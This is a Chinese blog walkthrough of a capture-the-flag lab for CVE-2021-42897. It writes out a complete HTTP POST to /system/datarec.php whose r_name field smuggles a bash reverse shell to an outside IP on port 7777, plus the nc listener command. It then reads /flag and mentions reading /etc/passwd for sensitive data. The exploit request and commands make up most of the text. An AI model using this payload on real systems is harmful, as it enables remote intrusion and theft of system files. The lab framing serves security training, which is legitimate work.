春秋云境CVE-2021-42897(保姆级教学)

1.阅读靶场介绍

这里我们可以得到的有用信息就是

存在任意代码执行漏洞

这里博主提前剧透一下

博主是post一个报文,然后反弹shell去cat /flag

带着思路我们直接进入靶场

2.启动靶场

我们会得到如下页面

这个页面博主试过弱密码/空口令/爆破等等最后发现没有成功

于是直接bp抓包,然后发送报文

这里各位要去修改host和请求体的内容(ip/port这两个参数)

复制代码
POST /system/datarec.php HTTP/2
Host: eci-2ze7xarqd63euoeunmxj.cloudeci1.ichunqiu.com:80
Content-Length: 75
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://eci-2ze3es0hytbdktzuz9xu.cloudeci1.ichunqiu.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://eci-2ze3es0hytbdktzuz9xu.cloudeci1.ichunqiu.com/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1666320065,1666528495,1666591607; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1666604245

r_name=$(bash+-c+'bash+-i+>%26+/dev/tcp/152.136.201.53/7777+0<%261+2>%261')

我们要开启nc -lvvp 7777先

然后就发送报文就会收到反弹shell了

接着就是去cat /flag一般来说我们都是去读取cat /etc/passwd

读取一些密码信息的(敏感文件)

就可以去复现这个漏洞了

到此文章又接近尾声了

感谢你们宝贵的时间

相关推荐
风控PM说4 小时前
入门第二课:业务催生风险,常见的业务风险有哪些?
安全
HavenlonLabs15 小时前
Havenlon 对抗性完整(十七):安全不是“防住攻击”,而是控制失败方式
网络·人工智能·架构·安全威胁分析·安全架构·havenlon
四月天4315 小时前
web安全-SSTI(服务器模板注入)
笔记·学习·web安全·网络安全
菩提小狗18 小时前
每日安全情报报告 · 2026-07-04
网络安全·漏洞·cve·安全情报·每日安全
独守一片天19 小时前
HarmonyOS 6.1.0 Call Service 来电识别与安全通信怎么设计?
安全·华为·harmonyos
想你依然心痛21 小时前
嵌入式C代码规范:MISRA-C 2012核心规则解读——类型安全与未定义行为深度剖析
c语言·安全·代码规范
Elastic 中国社区官方博客21 小时前
跟踪资金流向:使用 ES|QL 和跨集群搜索追踪洗钱网络
大数据·人工智能·安全·elasticsearch·搜索引擎·金融·全文检索
IT新视界1 天前
数据要素安全流通服务
安全
微信开发api-视频号协议1 天前
Codex++安全边界探秘:从模型能力到风险防御
前端·安全·微信·企业微信